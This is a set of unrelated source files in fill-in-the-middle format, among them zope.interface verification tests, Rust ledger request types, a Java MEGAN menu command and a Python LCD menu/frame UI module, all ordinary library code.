return data
def apply_rule(self, rule):
print 'Applying {0}'.format(rule['rule_name'])
if rule['rule_type'] == 'single':
rule['action'] = self.expand_action(rule['action'])
data = self.apply_rule_ingress(rule)
data = self.apply_data_processors(rule, data)
self.apply_rule_egress(rule, data)
else:
for child_rule_name in rule['members']:
self.apply_rule_by_name(child_rule_name)
def apply_rule_by_name(self, rule_name):
for rule in self:
if rule['rule_name'] == rule_name:
self.apply_rule(rule)
break
else:
sys.exit('Error! Rule not found')
def apply_rules(self):
for rule in self:
if rule['active']:
self.apply_rule(rule)<|fim▁end|> | self.conf = Conf()
self.load()
self.filter_recursion() |
<|file_name|>image.py<|end_file_name|><|fim▁begin|>from .attribute import html_attribute
from .element import VoidElement
class Image(VoidElement):
"""An HTML image (<img>) element.
Images must have an alternate text description that describes the
contents of the image, if the image can not be displayed. In some
cases the alternate text can be empty. For example, if the image just
displays a company logo next to the company's name or if the image just
adds an icon next to a textual description of an action.
Example:
>>> image = Image("whiteboard.jpg",
... "A whiteboard filled with mathematical formulas.")
>>> image.title = "Whiteboards are a useful tool"
"""
def __init__(self, url, alternate_text=""):
super().__init__("img")
self.url = url
self.alternate_text = alternate_text<|fim▁hole|> url = html_attribute("src")
alternate_text = html_attribute("alt")
title = html_attribute("title")<|fim▁end|> | |
<|file_name|>test_verify.py<|end_file_name|><|fim▁begin|>##############################################################################
#
# Copyright (c) 2001, 2002 Zope Foundation and Contributors.
# All Rights Reserved.
#
# This software is subject to the provisions of the Zope Public License,
# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.
# THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS
# FOR A PARTICULAR PURPOSE.
#
##############################################################################
""" zope.interface.verify unit tests
"""
import unittest
# pylint:disable=inherit-non-class,no-method-argument,no-self-argument
class Test_verifyClass(unittest.TestCase):
verifier = None
def setUp(self):
self.verifier = self._get_FUT()
@classmethod
def _get_FUT(cls):
from zope.interface.verify import verifyClass
return verifyClass
_adjust_object_before_verify = lambda self, x: x
def _callFUT(self, iface, klass, **kwargs):
return self.verifier(iface,
self._adjust_object_before_verify(klass),
**kwargs)
def test_class_doesnt_implement(self):
from zope.interface import Interface
from zope.interface.exceptions import DoesNotImplement
class ICurrent(Interface):
pass
class Current(object):
pass
self.assertRaises(DoesNotImplement, self._callFUT, ICurrent, Current)
def test_class_doesnt_implement_but_classImplements_later(self):
from zope.interface import Interface
from zope.interface import classImplements
class ICurrent(Interface):
pass
class Current(object):
pass
classImplements(Current, ICurrent)
self._callFUT(ICurrent, Current)
def test_class_doesnt_have_required_method_simple(self):
from zope.interface import Interface
from zope.interface import implementer
from zope.interface.exceptions import BrokenImplementation
class ICurrent(Interface):
def method():
pass
@implementer(ICurrent)
class Current(object):
pass
self.assertRaises(BrokenImplementation,
self._callFUT, ICurrent, Current)
def test_class_has_required_method_simple(self):
from zope.interface import Interface
from zope.interface import implementer
class ICurrent(Interface):
def method():
pass
@implementer(ICurrent)
class Current(object):
def method(self):
raise NotImplementedError()
self._callFUT(ICurrent, Current)
def test_class_doesnt_have_required_method_derived(self):
from zope.interface import Interface
from zope.interface import implementer
from zope.interface.exceptions import BrokenImplementation
class IBase(Interface):
def method():
pass
class IDerived(IBase):
pass
@implementer(IDerived)
class Current(object):
pass
self.assertRaises(BrokenImplementation,
self._callFUT, IDerived, Current)
def test_class_has_required_method_derived(self):
from zope.interface import Interface
from zope.interface import implementer
class IBase(Interface):
def method():
pass
class IDerived(IBase):
pass
@implementer(IDerived)
class Current(object):
def method(self):
raise NotImplementedError()
self._callFUT(IDerived, Current)
def test_method_takes_wrong_arg_names_but_OK(self):
# We no longer require names to match.
from zope.interface import Interface
from zope.interface import implementer
class ICurrent(Interface):
def method(a):
pass
@implementer(ICurrent)
class Current(object):
def method(self, b):
raise NotImplementedError()
self._callFUT(ICurrent, Current)
def test_method_takes_not_enough_args(self):
from zope.interface import Interface
from zope.interface import implementer
from zope.interface.exceptions import BrokenMethodImplementation
class ICurrent(Interface):
def method(a):
pass
@implementer(ICurrent)
class Current(object):
def method(self):
raise NotImplementedError()
self.assertRaises(BrokenMethodImplementation,
self._callFUT, ICurrent, Current)
def test_method_doesnt_take_required_starargs(self):
from zope.interface import Interface
from zope.interface import implementer
from zope.interface.exceptions import BrokenMethodImplementation
class ICurrent(Interface):
def method(*args):
pass
@implementer(ICurrent)
class Current(object):
def method(self):
raise NotImplementedError()
self.assertRaises(BrokenMethodImplementation,
self._callFUT, ICurrent, Current)
def test_method_doesnt_take_required_only_kwargs(self):
from zope.interface import Interface
from zope.interface import implementer
from zope.interface.exceptions import BrokenMethodImplementation
class ICurrent(Interface):
def method(**kw):
pass
@implementer(ICurrent)
class Current(object):
def method(self):
raise NotImplementedError()
self.assertRaises(BrokenMethodImplementation,
self._callFUT, ICurrent, Current)
def test_method_takes_extra_arg(self):
from zope.interface import Interface
from zope.interface import implementer
from zope.interface.exceptions import BrokenMethodImplementation
class ICurrent(Interface):
def method(a):
pass
@implementer(ICurrent)
class Current(object):
def method(self, a, b):
raise NotImplementedError()
self.assertRaises(BrokenMethodImplementation,
self._callFUT, ICurrent, Current)
def test_method_takes_extra_arg_with_default(self):
from zope.interface import Interface
from zope.interface import implementer
class ICurrent(Interface):
def method(a):
pass
@implementer(ICurrent)
class Current(object):
def method(self, a, b=None):
raise NotImplementedError()
self._callFUT(ICurrent, Current)
def test_method_takes_only_positional_args(self):
from zope.interface import Interface
from zope.interface import implementer
class ICurrent(Interface):
def method(a):
pass
@implementer(ICurrent)
class Current(object):
def method(self, *args):
raise NotImplementedError()
self._callFUT(ICurrent, Current)
def test_method_takes_only_kwargs(self):
from zope.interface import Interface
from zope.interface import implementer
from zope.interface.exceptions import BrokenMethodImplementation
class ICurrent(Interface):
def method(a):
pass
@implementer(ICurrent)
class Current(object):
def method(self, **kw):
raise NotImplementedError()
self.assertRaises(BrokenMethodImplementation,
self._callFUT, ICurrent, Current)
def test_method_takes_extra_starargs(self):
from zope.interface import Interface
from zope.interface import implementer
class ICurrent(Interface):
def method(a):
pass
@implementer(ICurrent)
class Current(object):
def method(self, a, *args):
raise NotImplementedError()
self._callFUT(ICurrent, Current)
def test_method_takes_extra_starargs_and_kwargs(self):
from zope.interface import Interface
from zope.interface import implementer
class ICurrent(Interface):
def method(a):
pass
@implementer(ICurrent)
class Current(object):
def method(self, a, *args, **kw):
raise NotImplementedError()
self._callFUT(ICurrent, Current)
def test_method_doesnt_take_required_positional_and_starargs(self):
from zope.interface import Interface
from zope.interface import implementer
from zope.interface.exceptions import BrokenMethodImplementation
class ICurrent(Interface):
def method(a, *args):
pass
@implementer(ICurrent)
class Current(object):
def method(self, a):
raise NotImplementedError()
self.assertRaises(BrokenMethodImplementation,
self._callFUT, ICurrent, Current)
def test_method_takes_required_positional_and_starargs(self):
from zope.interface import Interface
from zope.interface import implementer
class ICurrent(Interface):
def method(a, *args):
pass
@implementer(ICurrent)
class Current(object):
def method(self, a, *args):
raise NotImplementedError()
self._callFUT(ICurrent, Current)
def test_method_takes_only_starargs(self):
from zope.interface import Interface
from zope.interface import implementer
class ICurrent(Interface):
def method(a, *args):
pass
@implementer(ICurrent)
class Current(object):
def method(self, *args):
raise NotImplementedError()
self._callFUT(ICurrent, Current)
def test_method_takes_required_kwargs(self):
from zope.interface import Interface
from zope.interface import implementer
class ICurrent(Interface):
def method(**kwargs):
pass
@implementer(ICurrent)
class Current(object):
def method(self, **kw):
raise NotImplementedError()
self._callFUT(ICurrent, Current)
def test_method_takes_positional_plus_required_starargs(self):
from zope.interface import Interface
from zope.interface import implementer
from zope.interface.exceptions import BrokenMethodImplementation
class ICurrent(Interface):
def method(*args):
pass<|fim▁hole|> @implementer(ICurrent)
class Current(object):
def method(self, a, *args):
raise NotImplementedError()
self.assertRaises(BrokenMethodImplementation,
self._callFUT, ICurrent, Current)
def test_method_doesnt_take_required_kwargs(self):
from zope.interface import Interface
from zope.interface import implementer
from zope.interface.exceptions import BrokenMethodImplementation
class ICurrent(Interface):
def method(**kwargs):
pass
@implementer(ICurrent)
class Current(object):
def method(self, a):
raise NotImplementedError()
self.assertRaises(BrokenMethodImplementation,
self._callFUT, ICurrent, Current)
def test_class_has_method_for_iface_attr(self):
from zope.interface import Attribute
from zope.interface import Interface
from zope.interface import implementer
class ICurrent(Interface):
attr = Attribute("The foo Attribute")
@implementer(ICurrent)
class Current:
def attr(self):
raise NotImplementedError()
self._callFUT(ICurrent, Current)
def test_class_has_nonmethod_for_method(self):
from zope.interface import Interface
from zope.interface import implementer
from zope.interface.exceptions import BrokenMethodImplementation
class ICurrent(Interface):
def method():
pass
@implementer(ICurrent)
class Current:
method = 1
self.assertRaises(BrokenMethodImplementation,
self._callFUT, ICurrent, Current)
def test_class_has_attribute_for_attribute(self):
from zope.interface import Attribute
from zope.interface import Interface
from zope.interface import implementer
class ICurrent(Interface):
attr = Attribute("The foo Attribute")
@implementer(ICurrent)
class Current:
attr = 1
self._callFUT(ICurrent, Current)
def test_class_misses_attribute_for_attribute(self):
# This check *passes* for verifyClass
from zope.interface import Attribute
from zope.interface import Interface
from zope.interface import implementer
class ICurrent(Interface):
attr = Attribute("The foo Attribute")
@implementer(ICurrent)
class Current:
pass
self._callFUT(ICurrent, Current)
def test_w_callable_non_func_method(self):
from zope.interface.interface import Method
from zope.interface import Interface
from zope.interface import implementer
class QuasiMethod(Method):
def __call__(self, *args, **kw):
raise NotImplementedError()
class QuasiCallable(object):
def __call__(self, *args, **kw):
raise NotImplementedError()
class ICurrent(Interface):
attr = QuasiMethod('This is callable')
@implementer(ICurrent)
class Current:
attr = QuasiCallable()
self._callFUT(ICurrent, Current)
def test_w_decorated_method(self):
from zope.interface import Interface
from zope.interface import implementer
def decorator(func):
# this is, in fact, zope.proxy.non_overridable
return property(lambda self: func.__get__(self))
class ICurrent(Interface):
def method(a):
pass
@implementer(ICurrent)
class Current(object):
@decorator
def method(self, a):
raise NotImplementedError()
self._callFUT(ICurrent, Current)
def test_dict_IFullMapping(self):
# A dict should be an IFullMapping, but this exposes two
# issues. First, on CPython, methods of builtin types are
# "method_descriptor" objects, and are harder to introspect.
# Second, on PyPy, the signatures can be just plain wrong,
# specifying as required arguments that are actually optional.
# See https://github.com/zopefoundation/zope.interface/issues/118
from zope.interface.common.mapping import IFullMapping
self._callFUT(IFullMapping, dict, tentative=True)
def test_list_ISequence(self):
# As for test_dict_IFullMapping
from zope.interface.common.sequence import ISequence
self._callFUT(ISequence, list, tentative=True)
def test_tuple_IReadSequence(self):
# As for test_dict_IFullMapping
from zope.interface.common.sequence import IReadSequence
self._callFUT(IReadSequence, tuple, tentative=True)
def test_multiple_invalid(self):
from zope.interface.exceptions import MultipleInvalid
from zope.interface.exceptions import DoesNotImplement
from zope.interface.exceptions import BrokenImplementation
from zope.interface import Interface
from zope.interface import classImplements
class ISeveralMethods(Interface):
def meth1(arg1):
"Method 1"
def meth2(arg1):
"Method 2"
class SeveralMethods(object):
pass
with self.assertRaises(MultipleInvalid) as exc:
self._callFUT(ISeveralMethods, SeveralMethods)
ex = exc.exception
self.assertEqual(3, len(ex.exceptions))
self.assertIsInstance(ex.exceptions[0], DoesNotImplement)
self.assertIsInstance(ex.exceptions[1], BrokenImplementation)
self.assertIsInstance(ex.exceptions[2], BrokenImplementation)
# If everything else is correct, only the single error is raised without
# the wrapper.
classImplements(SeveralMethods, ISeveralMethods)
SeveralMethods.meth1 = lambda self, arg1: "Hi"
with self.assertRaises(BrokenImplementation):
self._callFUT(ISeveralMethods, SeveralMethods)
class Test_verifyObject(Test_verifyClass):
@classmethod
def _get_FUT(cls):
from zope.interface.verify import verifyObject
return verifyObject
def _adjust_object_before_verify(self, target):
if isinstance(target, (type, type(OldSkool))):
target = target()
return target
def test_class_misses_attribute_for_attribute(self):
# This check *fails* for verifyObject
from zope.interface import Attribute
from zope.interface import Interface
from zope.interface import implementer
from zope.interface.exceptions import BrokenImplementation
class ICurrent(Interface):
attr = Attribute("The foo Attribute")
@implementer(ICurrent)
class Current:
pass
self.assertRaises(BrokenImplementation,
self._callFUT, ICurrent, Current)
def test_module_hit(self):
from zope.interface.tests.idummy import IDummyModule
from zope.interface.tests import dummy
self._callFUT(IDummyModule, dummy)
def test_module_miss(self):
from zope.interface import Interface
from zope.interface.tests import dummy
from zope.interface.exceptions import DoesNotImplement
# same name, different object
class IDummyModule(Interface):
pass
self.assertRaises(DoesNotImplement,
self._callFUT, IDummyModule, dummy)
def test_staticmethod_hit_on_class(self):
from zope.interface import Interface
from zope.interface import provider
from zope.interface.verify import verifyObject
class IFoo(Interface):
def bar(a, b):
"The bar method"
@provider(IFoo)
class Foo(object):
@staticmethod
def bar(a, b):
raise AssertionError("We're never actually called")
# Don't use self._callFUT, we don't want to instantiate the
# class.
verifyObject(IFoo, Foo)
class OldSkool:
pass<|fim▁end|> | |
<|file_name|>types.rs<|end_file_name|><|fim▁begin|>extern crate serde_json;
use services::anoncreds::types::{PublicKey, RevocationPublicKey};
use utils::json::{JsonEncodable, JsonDecodable};
use services::ledger::constants::{
NODE,
NYM,
ATTRIB,
SCHEMA,
GET_ATTR,
GET_DDO,
GET_NYM,
GET_SCHEMA,
CLAIM_DEF,
GET_CLAIM_DEF,
STEWARD,
TRUSTEE,
TRUST_ANCHOR,
GET_TXN
};
#[derive(Serialize, PartialEq, Debug)]
#[serde(rename_all = "camelCase")]
pub struct Request<T: JsonEncodable> {
pub req_id: u64,
pub identifier: String,
pub operation: T,
#[serde(skip_serializing_if = "Option::is_none")]
pub signature: Option<String>
}
impl<T: JsonEncodable> Request<T> {
pub fn new(req_id: u64, identifier: String, operation: T) -> Request<T> {
Request {
req_id: req_id,
identifier: identifier,
operation: operation,
signature: None
}
}
}
impl<T: JsonEncodable> JsonEncodable for Request<T> {}
#[derive(Deserialize, Serialize, PartialEq, Debug)]
pub enum Role {
Steward = STEWARD,
Trustee = TRUSTEE,
TrustAnchor = TRUST_ANCHOR
}
#[derive(Serialize, PartialEq, Debug)]
pub struct NymOperation {
#[serde(rename = "type")]
pub _type: String,
pub dest: String,
#[serde(skip_serializing_if = "Option::is_none")]
pub verkey: Option<String>,
#[serde(skip_serializing_if = "Option::is_none")]
pub alias: Option<String>,
#[serde(skip_serializing_if = "Option::is_none")]
pub role: Option<String>
}
impl NymOperation {
pub fn new(dest: String, verkey: Option<String>,
alias: Option<String>, role: Option<String>) -> NymOperation {
NymOperation {
_type: NYM.to_string(),
dest: dest,
verkey: verkey,
alias: alias,
role: role
}
}
}
impl JsonEncodable for NymOperation {}
#[derive(Serialize, PartialEq, Debug)]
pub struct GetNymOperation {
#[serde(rename = "type")]
pub _type: String,
pub dest: String
}
impl GetNymOperation {
pub fn new(dest: String) -> GetNymOperation {
GetNymOperation {
_type: GET_NYM.to_string(),
dest: dest
}
}
}
impl JsonEncodable for GetNymOperation {}
#[derive(Serialize, PartialEq, Debug)]
pub struct AttribOperation {
#[serde(rename = "type")]
pub _type: String,
pub dest: String,
#[serde(skip_serializing_if = "Option::is_none")]
pub hash: Option<String>,
#[serde(skip_serializing_if = "Option::is_none")]
pub raw: Option<String>,
#[serde(skip_serializing_if = "Option::is_none")]
pub enc: Option<String>
}
impl AttribOperation {
pub fn new(dest: String, hash: Option<String>, raw: Option<String>,
enc: Option<String>) -> AttribOperation {
AttribOperation {
_type: ATTRIB.to_string(),
dest: dest,
hash: hash,
raw: raw,
enc: enc,
}
}
}
impl JsonEncodable for AttribOperation {}
#[derive(Serialize, PartialEq, Debug)]
pub struct GetAttribOperation {
#[serde(rename = "type")]
pub _type: String,
pub dest: String,
pub raw: String
}
impl GetAttribOperation {
pub fn new(dest: String, raw: String) -> GetAttribOperation {
GetAttribOperation {
_type: GET_ATTR.to_string(),
dest: dest,
raw: raw
}
}
}
impl JsonEncodable for GetAttribOperation {}
#[derive(Serialize, PartialEq, Debug)]
pub struct SchemaOperation {
#[serde(rename = "type")]
pub _type: String,
pub data: SchemaOperationData,
}
impl SchemaOperation {
pub fn new(data: SchemaOperationData) -> SchemaOperation {
SchemaOperation {
data: data,
_type: SCHEMA.to_string()
}
}
}
impl JsonEncodable for SchemaOperation {}
#[derive(Serialize, PartialEq, Debug, Deserialize)]
pub struct SchemaOperationData {
name: String,
version: String,
attr_names: Vec<String>
}
impl SchemaOperationData {
pub fn new(name: String, version: String, keys: Vec<String>) -> SchemaOperationData {
SchemaOperationData {
name: name,
version: version,
attr_names: keys
}
}
}
impl JsonEncodable for SchemaOperationData {}
impl<'a> JsonDecodable<'a> for SchemaOperationData {}
#[derive(Serialize, PartialEq, Debug)]
pub struct GetSchemaOperation {
#[serde(rename = "type")]
pub _type: String,
pub dest: String,
pub data: GetSchemaOperationData
}
impl GetSchemaOperation {
pub fn new(dest: String, data: GetSchemaOperationData) -> GetSchemaOperation {
GetSchemaOperation {
_type: GET_SCHEMA.to_string(),
dest: dest,
data: data
}
}
}
impl JsonEncodable for GetSchemaOperation {}
#[derive(Deserialize, PartialEq, Debug)]
#[serde(rename_all = "camelCase")]
pub struct GetSchemaResultData {
pub attr_names: Vec<String>,
pub name: String,
pub origin: String,
pub seq_no: String,
#[serde(rename = "type")]
pub _type: Option<String>,
pub version: String
}
#[derive(Serialize, PartialEq, Debug, Deserialize)]
pub struct GetSchemaOperationData {
pub name: String,
pub version: String
}
impl GetSchemaOperationData {
pub fn new(name: String, version: String) -> GetSchemaOperationData {
GetSchemaOperationData {
name: name,
version: version
}
}
}
impl JsonEncodable for GetSchemaOperationData {}
impl<'a> JsonDecodable<'a> for GetSchemaOperationData {}
#[derive(Serialize, PartialEq, Debug)]
pub struct ClaimDefOperation {
#[serde(rename = "ref")]
pub _ref: i32,
pub data: ClaimDefOperationData,
#[serde(rename = "type")]
pub _type: String,
pub signature_type: String
}
impl ClaimDefOperation {
pub fn new(_ref: i32, signature_type: String, data: ClaimDefOperationData) -> ClaimDefOperation {
ClaimDefOperation {
_ref: _ref,
signature_type: signature_type,
data: data,
_type: CLAIM_DEF.to_string()
}
}
}
impl JsonEncodable for ClaimDefOperation {}
#[derive(Serialize, PartialEq, Debug, Deserialize)]
pub struct ClaimDefOperationData {
pub primary: PublicKey,
#[serde(serialize_with = "empty_map_instead_of_null")] //FIXME
pub revocation: Option<RevocationPublicKey>
}
impl ClaimDefOperationData {
pub fn new(primary: PublicKey, revocation: Option<RevocationPublicKey>) -> ClaimDefOperationData {
ClaimDefOperationData {
primary: primary,
revocation: revocation
}
}
}
//FIXME workaround for ledger: serialize required dictionary as empty instead of using null
extern crate serde;
use self::serde::Serializer;
use self::serde::ser::SerializeMap;
fn empty_map_instead_of_null<S>(x: &Option<RevocationPublicKey>, s: S) -> Result<S::Ok, S::Error>
where S: Serializer {
if let &Some(ref x) = x {
s.serialize_some(&x)
} else {
s.serialize_map(None)?.end()
}
}
//FIXME
impl JsonEncodable for ClaimDefOperationData {}
impl<'a> JsonDecodable<'a> for ClaimDefOperationData {}
#[derive(Serialize, PartialEq, Debug)]
pub struct GetClaimDefOperation {
#[serde(rename = "type")]
pub _type: String,
#[serde(rename = "ref")]
pub _ref: i32,
pub signature_type: String,
pub origin: String
}
impl GetClaimDefOperation {
pub fn new(_ref: i32, signature_type: String, origin: String) -> GetClaimDefOperation {
GetClaimDefOperation {
_type: GET_CLAIM_DEF.to_string(),
_ref: _ref,
signature_type: signature_type,
origin: origin
}
}
}
impl JsonEncodable for GetClaimDefOperation {}
#[derive(Serialize, PartialEq, Debug)]
pub struct NodeOperation {
#[serde(rename = "type")]
pub _type: String,
pub dest: String,
pub data: NodeOperationData
}
impl NodeOperation {
pub fn new(dest: String, data: NodeOperationData) -> NodeOperation {
NodeOperation {
_type: NODE.to_string(),
dest: dest,
data: data
}
}
}
impl JsonEncodable for NodeOperation {}
#[derive(Serialize, PartialEq, Debug, Deserialize)]
pub enum Services {
VALIDATOR,
OBSERVER
}
#[derive(Serialize, PartialEq, Debug, Deserialize)]
pub struct NodeOperationData {
pub node_ip: String,
pub node_port: i32,
pub client_ip: String,
pub client_port: i32,
pub alias: String,
pub services: Vec<Services>
}
impl NodeOperationData {
pub fn new(node_ip: String, node_port: i32, client_ip: String, client_port: i32, alias: String, services: Vec<Services>) -> NodeOperationData {
NodeOperationData {
node_ip: node_ip,
node_port: node_port,
client_ip: client_ip,
client_port: client_port,
alias: alias,
services: services
}
}
}
impl JsonEncodable for NodeOperationData {}
impl<'a> JsonDecodable<'a> for NodeOperationData {}
#[derive(Serialize, PartialEq, Debug)]
pub struct GetDdoOperation {
#[serde(rename = "type")]
pub _type: String,
pub dest: String
}
impl GetDdoOperation {
pub fn new(dest: String) -> GetDdoOperation {
GetDdoOperation {<|fim▁hole|> _type: GET_DDO.to_string(),
dest: dest
}
}
}
impl JsonEncodable for GetDdoOperation {}
#[derive(Serialize, PartialEq, Debug)]
pub struct GetTxnOperation {
#[serde(rename = "type")]
pub _type: String,
pub data: i32
}
impl GetTxnOperation {
pub fn new(data: i32) -> GetTxnOperation {
GetTxnOperation {
_type: GET_TXN.to_string(),
data: data
}
}
}
impl JsonEncodable for GetTxnOperation {}
#[derive(Deserialize, Eq, PartialEq, Debug)]
pub struct Reply<T> {
pub op: String,
pub result: T,
}
impl<'a, T: JsonDecodable<'a>> JsonDecodable<'a> for Reply<T> {}
#[derive(Deserialize, Eq, PartialEq, Debug)]
#[serde(rename_all = "camelCase")]
pub struct GetNymReplyResult {
pub identifier: String,
pub req_id: u64,
#[serde(rename = "type")]
pub _type: String,
pub data: String,
pub dest: String
}
impl<'a> JsonDecodable<'a> for GetNymReplyResult {}
#[derive(Deserialize, Eq, PartialEq, Debug)]
#[serde(rename_all = "camelCase")]
pub struct GetNymResultData {
pub identifier: Option<String>,
pub dest: String,
pub role: Option<String>,
pub verkey: Option<String>
}
impl<'a> JsonDecodable<'a> for GetNymResultData {}<|fim▁end|> | |
<|file_name|>EcologicalIndexEuclideanCommand.java<|end_file_name|><|fim▁begin|>/*
* EcologicalIndexEuclideanCommand.java Copyright (C) 2021. Daniel H. Huson
*
* (Some files contain contributions from other authors, who are then mentioned separately.)
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>.
*
*/
package megan.clusteranalysis.commands;
import jloda.swing.commands.ICheckBoxCommand;
import jloda.util.parse.NexusStreamParser;
import megan.clusteranalysis.ClusterViewer;
import megan.clusteranalysis.indices.EuclideanDistance;
import javax.swing.*;
import java.awt.event.ActionEvent;
/**<|fim▁hole|> * method=Euclidean command
* Daniel Huson, 6.2010
*/
public class EcologicalIndexEuclideanCommand extends CommandBase implements ICheckBoxCommand {
/**
* this is currently selected?
*
* @return selected
*/
public boolean isSelected() {
ClusterViewer viewer = getViewer();
return viewer.getEcologicalIndex().equalsIgnoreCase(EuclideanDistance.NAME);
}
/**
* get the name to be used as a menu label
*
* @return name
*/
public String getName() {
return "Use Euclidean";
}
/**
* get description to be used as a tool-tip
*
* @return description
*/
public String getDescription() {
return "Use Euclidean ecological index";
}
/**
* get icon to be used in menu or button
*
* @return icon
*/
public ImageIcon getIcon() {
return null;
}
/**
* gets the accelerator key to be used in menu
*
* @return accelerator key
*/
public KeyStroke getAcceleratorKey() {
return null;
}
/**
* action to be performed
*
* @param ev
*/
public void actionPerformed(ActionEvent ev) {
execute("set index=" + EuclideanDistance.NAME + ";");
}
/**
* gets the command needed to undo this command
*
* @return undo command
*/
public String getUndo() {
return null;
}
/**
* is the command currently applicable? Used to set enable state of command
*
* @return true, if command can be applied
*/
public boolean isApplicable() {
return getViewer().getParentViewer() != null && getViewer().getParentViewer().hasComparableData()
&& getViewer().getParentViewer().getSelectedNodes().size() > 0;
}
/**
* is this a critical command that can only be executed when no other command is running?
*
* @return true, if critical
*/
public boolean isCritical() {
return true;
}
/**
* parses the given command and executes it
*
* @param np
* @throws java.io.IOException
*/
public void apply(NexusStreamParser np) throws Exception {
}
/**
* get command-line usage description
*
* @return usage
*/
public String getSyntax() {
return null;
}
}<|fim▁end|> | |
<|file_name|>frame.py<|end_file_name|><|fim▁begin|>from collections import deque
from lcdui import common
from lcdui.ui import widget
import array
import time
class Frame(object):
def __init__(self, ui):
self._ui = ui<|fim▁hole|> self._screen_buffer = ScreenBuffer(self.rows(), self.cols())
self.onInitialize()
def BuildWidget(self, widget_cls, name=None, row=0, col=0, span=None, **kwargs):
widget_obj = widget_cls(self, **kwargs)
if name is None:
name = widget_obj
self.AddWidget(widget_obj, name, row, col, span)
return widget_obj
def rows(self):
"""Returns the number of rows in the frame."""
return self._ui.rows()
def cols(self):
"""Returns the number of columns in the frame."""
return self._ui.cols()
def onInitialize(self):
pass
def AddWidget(self, widget_obj, name, row=0, col=0, span=None):
"""Adds a widget to the current frame.
Args:
widget_obj: the widget to be added
name: the name of the widget
row: the row position of the widget
col: the column position of the widget
span: the character mask for the widget (or None if no mask)
"""
self._widgets[name] = widget_obj
self._position[name] = (row, col)
self._span[name] = span or max(0, self.cols() - col)
def GetWidget(self, name):
return self._widgets.get(name)
def RemoveWidget(self, name):
"""Removes the widget with the given name."""
del self._widgets[name]
del self._position[name]
del self._span[name]
def Paint(self):
"""Causes a repaint to happen, updating any internal buffers."""
for name, w in self._widgets.iteritems():
outstr = w.Paint()
row, col = self._position[name]
span = self._span[name]
self._screen_buffer.Write(array.array('c', outstr), row, col, span)
return self._screen_buffer
class TextFrame(Frame):
def __init__(self, ui, title='', lines=None):
Frame.__init__(self, ui)
self._title = title
if lines is None:
lines = []
self._lines = lines
self._UpdateText()
def _UpdateText(self):
lineno = 0
if self._title:
title_text = '_' + self._title
lineno = 1
if len(title_text) < (self.cols() - 1):
title_text += '_'*(self.cols() - len(title_text) - 1)
self.BuildWidget(widget.LineWidget, name='line0',
row=0, col=0, contents=title_text)
idx = 0
for lineno in xrange(lineno, self.rows()):
if idx < len(self._lines):
content = self._lines[idx]
else:
content = ''
idx += 1
line_name = 'line%i' % lineno
self.BuildWidget(widget.LineWidget, 'line%i' % lineno,
row=lineno, col=0, contents=content)
def SetTitle(self, title):
self._title = title
self._UpdateText()
def AddLine(self, line):
self._lines.append(str(line))
self._UpdateText()
class MultiFrame(Frame):
def __init__(self, ui):
Frame.__init__(self, ui)
self._inner_frames = deque()
self._display_time = {}
self._last_rotate = None
def AddWidget(self, widget_obj, name, row=0, col=0, span=None):
raise NotImplementedError
def GetWidget(self, name):
raise NotImplementedError
def RemoveWidget(self, name):
raise NotImplementedError
def frames(self):
return self._inner_frames
def AddFrame(self, frame, display_time):
self._inner_frames.append(frame)
self._display_time[frame] = display_time
def RemoveFrame(self, frame):
self._inner_frames.remove(frame)
del self._display_time[frame]
def Paint(self):
if not self._inner_frames:
return ''
now = time.time()
if self._last_rotate:
active_time = now - self._last_rotate
else:
self._last_rotate = now
active_time = 0
curr = self._inner_frames[0]
if len(self._inner_frames) > 1:
max_time = self._display_time[curr]
if active_time > max_time:
self._inner_frames.rotate(-1)
self._last_rotate = now
return curr.Paint()
class MenuFrame(Frame):
def onInitialize(self):
self._show_back = False
self._items = []
self._cursor_pos = 0
self._window_pos = 0
self._window_size = self.rows() - 1
self._title_widget = self.BuildWidget(widget.LineWidget, row=0, col=0)
self.setTitle('')
self._item_widgets = []
for i in xrange(self._window_size):
w = self.BuildWidget(widget.LineWidget, row=i+1, col=0)
self._item_widgets.append(w)
self._rebuildMenu()
def showBack(self, enable):
self._show_back = enable
self._rebuildMenu()
def addItem(self, key, value):
self._items.append((key, value))
self._rebuildMenu()
def scrollUp(self):
if self._cursor_pos == 0:
return
self._cursor_pos -= 1
self._updateWindowPos()
self._rebuildMenu()
def scrollDown(self):
if (self._cursor_pos + 1) == len(self._items):
return
self._cursor_pos += 1
self._updateWindowPos()
self._rebuildMenu()
def _rebuildMenu(self):
items = self._items[self._window_pos:self._window_pos+self._window_size]
num_blank = self._window_size - len(items)
symbol_up = self._ui.GetSymbol(common.SYMBOL.MENU_LIST_UP)
symbol_down = self._ui.GetSymbol(common.SYMBOL.MENU_LIST_DOWN)
symbol_cursor = self._ui.GetSymbol(common.SYMBOL.MENU_CURSOR)
for item_pos in xrange(len(items)):
item_id, item_value = items[item_pos]
w = self._item_widgets[item_pos]
w.set_contents(item_value)
for blank_pos in xrange(len(items), self._window_size):
w = self._item_widgets[blank_pos]
w.set_contents('')
# draw cursor
for i in xrange(len(self._item_widgets)):
w = self._item_widgets[i]
if i == (self._cursor_pos % self._window_size):
w.set_prefix(symbol_cursor + '|')
else:
w.set_prefix(' |')
w.set_postfix('| ')
if self._window_pos > 0:
self._item_widgets[0].set_postfix('|' + symbol_up)
if (self._window_pos + self._window_size) < len(self._items):
self._item_widgets[-1].set_postfix('|' + symbol_down)
def _updateWindowPos(self):
self._window_pos = self._cursor_pos - (self._cursor_pos % self._window_size)
def setTitle(self, title):
prefix = ''
symbol_back = self._ui.GetSymbol(common.SYMBOL.FRAME_BACK)
if self._show_back:
postfix = '_' + symbol_back + '_'
else:
postfix = ''
avail = self.cols()
title_str = title
if len(title_str) < avail:
title_str += '_' * (avail - len(title_str))
self._title_widget.set_contents(title_str)
self._title_widget.set_prefix(prefix)
self._title_widget.set_postfix(postfix)
